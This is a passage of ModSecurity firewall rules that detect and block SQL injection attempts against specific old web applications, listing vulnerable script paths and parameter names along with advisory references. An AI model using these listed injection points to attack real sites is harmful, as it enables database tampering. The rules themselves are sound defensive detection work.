searchoption.asp cost1 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005747,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cost1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005753,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cost2/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005759,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:acreage1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005765,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:squarefeet1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004665,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3403'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoria/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /roleManager.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains type=query&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE SecRule REQUEST_LINE "@contains /class/debug/debug_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003822,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3850'" SecRule &TX:'/SQL_INJECTION.*ARGS:executed_queries/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003863) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id UPDATE SecRule REQUEST_LINE "@contains /devami.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003863,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3936'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE SecRule REQUEST_LINE "@contains /cgi-bin/reorder2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004468,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004504,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:country/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004510) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004510,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004516) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004516,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:website/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004522) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004522,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:message/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011730) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /html/studentmain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011730,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,40737'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:session/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004121) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL Injection Attempt -- index.php catid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004121,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL Injection Attempt -- index.php catid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3509'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL Injection Attempt -- index.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006314) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE SecRule REQUEST_LINE "@contains /utilities/usermessages.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006314,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23372'" SecRule &TX:'/SQL_INJECTION.*ARGS:mesid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004420,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/461671/100/0/threaded'" SecRule REQUEST_LINE "@contains serendipity[multiCat][" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005795) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE SecRule REQUEST_LINE "@contains /orange.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005795,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21905'" SecRule &TX:'/SQL_INJECTION.*ARGS:CatID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003857,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3942'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsnr/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004784) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE SecRule REQUEST_LINE "@contains /logon_user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004784,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7088'" SecRule &TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE SecRule REQUEST_LINE "@contains /update_profile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004790,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7088'" SecRule &TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE SecRule REQUEST_LINE "@contains /page.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005876,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3076'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005523) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005523,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:ps/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005529) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005529,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:us/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005535) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005535,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:f/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005541) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005541,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005547) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005547,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005553) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005553,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:f/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005559,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:us/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005566,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'" SecRule &TX:'/SQL_INJECTION.*ARGS:ps/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004868) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE SecRule REQUEST_LINE "@contains /pop_profile.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004868,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id 